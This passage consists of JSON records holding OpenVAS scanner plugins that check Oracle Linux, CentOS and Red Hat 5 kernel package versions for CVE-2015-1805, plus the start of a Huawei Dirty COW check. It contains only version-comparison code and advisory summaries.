- kernel security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1042\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1042.html\");\n script_cve_id(\"CVE-2015-1805\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~406.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~406.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~406.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~406.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~406.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~406.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~406.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~406.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~406.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~406.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~406.el5~1.4.10~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~406.el5PAE~1.4.10~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~406.el5debug~1.4.10~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~406.el5xen~1.4.10~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~406.el5~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~406.el5PAE~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~406.el5debug~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~406.el5xen~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1805"], "description": "Oracle Linux Local Security Checks ELSA-2015-1042-1", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123108", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123108", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-1042-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1042-1.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123108\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:59:28 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1042-1\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1042-1 - kernel security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1042-1\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1042-1.html\");\n script_cve_id(\"CVE-2015-1805\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~406.0.0.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~406.0.0.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~406.0.0.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~406.0.0.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~406.0.0.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~406.0.0.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~406.0.0.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~406.0.0.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~406.0.0.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~406.0.0.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~406.0.0.0.1.el5~1.4.10~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~406.0.0.0.1.el5PAE~1.4.10~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~406.0.0.0.1.el5debug~1.4.10~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~406.0.0.0.1.el5xen~1.4.10~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~406.0.0.0.1.el5~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~406.0.0.0.1.el5PAE~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~406.0.0.0.1.el5debug~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~406.0.0.0.1.el5xen~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1805"], "description": "Check the version of kernel", "modified": "2019-03-08T00:00:00", "published": "2015-06-09T00:00:00", "id": "OPENVAS:1361412562310882189", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882189", "type": "openvas", "title": "CentOS Update for kernel CESA-2015:1042 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2015:1042 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882189\");\n script_version(\"$Revision: 14058 $\");\n script_cve_id(\"CVE-2015-1805\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-09 11:03:54 +0200 (Tue, 09 Jun 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for kernel CESA-2015:1042 centos5\");\n script_tag(name:\"summary\", value:\"Check the version of kernel\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux\n kernel, the core of any Linux operating system.\n\n * It was found that the Linux kernel's implementation of vectored pipe read\nand write functionality did not take into account the I/O vectors that were\nalready processed when retrying after a failed atomic access operation,\npotentially resulting in memory corruption due to an I/O vector array\noverrun. A local, unprivileged user could use this flaw to crash the system\nor, potentially, escalate their privileges on the system. (CVE-2015-1805,\nImportant)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update fixes the following bugs:\n\n * Due to a bug in the lpfc_device_reset_handler() function, a scsi command\ntimeout could lead to a system crash. With this update,\nlpfc_device_reset_handler recovers storage without crashing. (BZ#1070964)\n\n * Due to the code decrementing the reclaim_in_progress counter without\nhaving incremented it first, severe spinlock contention occurred in the\nshrink_zone() function even though the vm.max_reclaims_in_progress feature\nwas set to 1. This update provides a patch fixing the underlying source\ncode, and spinlock contention no longer occurs in this scenario.\n(BZ#1164105)\n\n * A TCP socket using SACK that had a retransmission but recovered from it,\nfailed to reset the retransmission timestamp. As a consequence, on certain\nconnections, if a packet had to be re-transmitted, the retrans_stamp\nvariable was only cleared when the next acked packet was received.\nThis could lead to an early abortion of the TCP connection if this next\npacket also got lost. With this update, the socket clears retrans_stamp\nwhen the recovery is completed, thus fixing the bug. (BZ#1205521)\n\n * Previously, the signal delivery paths did not clear the TS_USEDFPU flag,\nwhich could cause problems in the switch_to() function and lead to\nfloating-point unit (FPU) corruption. With this update, TS_USEDFPU is\ncleared as expected, and FPU is no longer under threat of corruption.\n(BZ#1193505)\n\n * A race condition in the exit_sem() function previously caused the\nsemaphore undo list corruption. As a consequence, a kernel crash could\noccur. The corruption in the semaphore undo list has been fixed, and the\nkernel no longer crashes in this situation. (BZ#1124574)\n\n * Previously, when running the 'virsh blockresize [Device] [Newsize]'\ncommand to resize the disk, the new size was not reflected in a Red Hat\nEnterprise Linux 5 Virtual Machine (VM). With this update, the new size is\nnow reflected online immediately in a Red Hat Enterprise Linux 5 VM so it\nis no longer necessary to reboot the VM to see the new disk size.\n(BZ#1 ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:1042\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-June/021156.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~406.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~406.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~406.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~406.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~406.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~406.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~406.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~406.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~406.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~406.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1805"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2015-06-09T00:00:00", "id": "OPENVAS:1361412562310871365", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871365", "type": "openvas", "title": "RedHat Update for kernel RHSA-2015:1042-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2015:1042-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871365\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-09 11:01:05 +0200 (Tue, 09 Jun 2015)\");\n script_cve_id(\"CVE-2015-1805\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2015:1042-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n * It was found that the Linux kernel's implementation of vectored pipe read\nand write functionality did not take into account the I/O vectors that were\nalready processed when retrying after a failed atomic access operation,\npotentially resulting in memory corruption due to an I/O vector array\noverrun. A local, unprivileged user could use this flaw to crash the system\nor, potentially, escalate their privileges on the system. (CVE-2015-1805,\nImportant)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update fixes the following bugs:\n\n * Due to a bug in the lpfc_device_reset_handler() function, a scsi command\ntimeout could lead to a system crash. With this update,\nlpfc_device_reset_handler recovers storage without crashing. (BZ#1070964)\n\n * Due to the code decrementing the reclaim_in_progress counter without\nhaving incremented it first, severe spinlock contention occurred in the\nshrink_zone() function even though the vm.max_reclaims_in_progress feature\nwas set to 1. This update provides a patch fixing the underlying source\ncode, and spinlock contention no longer occurs in this scenario.\n(BZ#1164105)\n\n * A TCP socket using SACK that had a retransmission but recovered from it,\nfailed to reset the retransmission timestamp. As a consequence, on certain\nconnections, if a packet had to be re-transmitted, the retrans_stamp\nvariable was only cleared when the next acked packet was received.\nThis could lead to an early abortion of the TCP connection if this next\npacket also got lost. With this update, the socket clears retrans_stamp\nwhen the recovery is completed, thus fixing the bug. (BZ#1205521)\n\n * Previously, the signal delivery paths did not clear the TS_USEDFPU flag,\nwhich could cause problems in the switch_to() function and lead to\nfloating-point unit (FPU) corruption. With this update, TS_USEDFPU is\ncleared as expected, and FPU is no longer under threat of corruption.\n(BZ#1193505)\n\n * A race condition in the exit_sem() function previously caused the\nsemaphore undo list corruption. As a consequence, a kernel crash could\noccur. The corruption in the semaphore undo list has been fixed, and the\nkernel no longer crashes in this situation. (BZ#1124574)\n\n * Previously, when running the 'virsh blockresize [Device] [Newsize]'\ncommand to resize the disk, the new size was not reflected in a Red Hat\nEnterprise Linux 5 Virtual Machine (VM). With this update, the new size is\nnow reflected online immediately in a Red Hat Enterprise Linux 5 VM so it\nis no longer necessary to reboot the VM t ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"kernel on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:1042-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-June/msg00001.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~406.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:45:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "In the morning of October 21th, 2016, a security researcher Phil Oester disclosed a local privilege escalation vulnerability in Linux kernel.", "modified": "2020-06-06T00:00:00", "published": "2020-06-05T00:00:00", "id": "OPENVAS:1361412562310108768", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108768", "type": "openvas", "title": "Huawei Data Communication: Dirty COW Vulnerability in Huawei Products (huawei-sa-20161207-01-dirtycow)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108768\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2016-5195\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Dirty COW Vulnerability in Huawei Products (huawei-sa-20161207-01-dirtycow)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"In the morning of October 21th, 2016, a security researcher Phil Oester disclosed a local privilege escalation vulnerability in Linux kernel.\");\n\n script_tag(name:\"insight\", value:\"In the morning of October 21th, 2016, a security researcher Phil Oester disclosed a local privilege escalation vulnerability in Linux kernel. A race condition was found in the way the Linux 